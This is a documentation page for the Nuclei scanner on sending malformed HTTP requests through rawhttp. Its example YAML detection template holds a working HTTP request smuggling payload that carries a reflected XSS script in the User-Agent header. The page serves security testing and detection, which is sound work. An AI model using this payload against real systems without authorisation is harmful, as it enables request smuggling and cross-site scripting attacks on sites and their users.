mirror of
https://github.com/projectdiscovery/nuclei.git
synced 2025-12-19 19:25:23 +00:00
39 lines
1.1 KiB
Plaintext
39 lines
1.1 KiB
Plaintext
|
---
|
||
|
|
title: "Unsafe HTTP Requests"
|
||
|
|
---
|
||
|
|
|
||
|
|
Nuclei supports [rawhttp](https://github.com/projectdiscovery/rawhttp) for complete request control and customization allowing **any kind of malformed requests** for issues like HTTP request smuggling, Host header injection, CRLF with malformed characters and more.
|
||
|
|
|
||
|
|
**rawhttp** library is disabled by default and can be enabled by including `unsafe: true` in the request block.
|
||
|
|
|
||
|
|
Here is an example of HTTP request smuggling detection template using `rawhttp`.
|
||
|
|
|
||
|
|
```yaml
|
||
|
|
http:
|
||
|
|
- raw:
|
||
|
|
- |+
|
||
|
|
POST / HTTP/1.1
|
||
|
|
Host: {{Hostname}}
|
||
|
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
Content-Length: 150
|
||
|
|
Transfer-Encoding: chunked
|
||
|
|
|
||
|
|
0
|
||
|
|
|
||
|
|
GET /post?postId=5 HTTP/1.1
|
||
|
|
User-Agent: a"/><script>alert(1)</script>
|
||
|
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
Content-Length: 5
|
||
|
|
|
||
|
|
x=1
|
||
|
|
- |+
|
||
|
|
GET /post?postId=5 HTTP/1.1
|
||
|
|
Host: {{Hostname}}
|
||
|
|
|
||
|
|
unsafe: true # Enables rawhttp client
|
||
|
|
matchers:
|
||
|
|
- type: dsl
|
||
|
|
dsl:
|
||
|
|
- 'contains(body, "<script>alert(1)</script>")'
|
||
|
|
```
|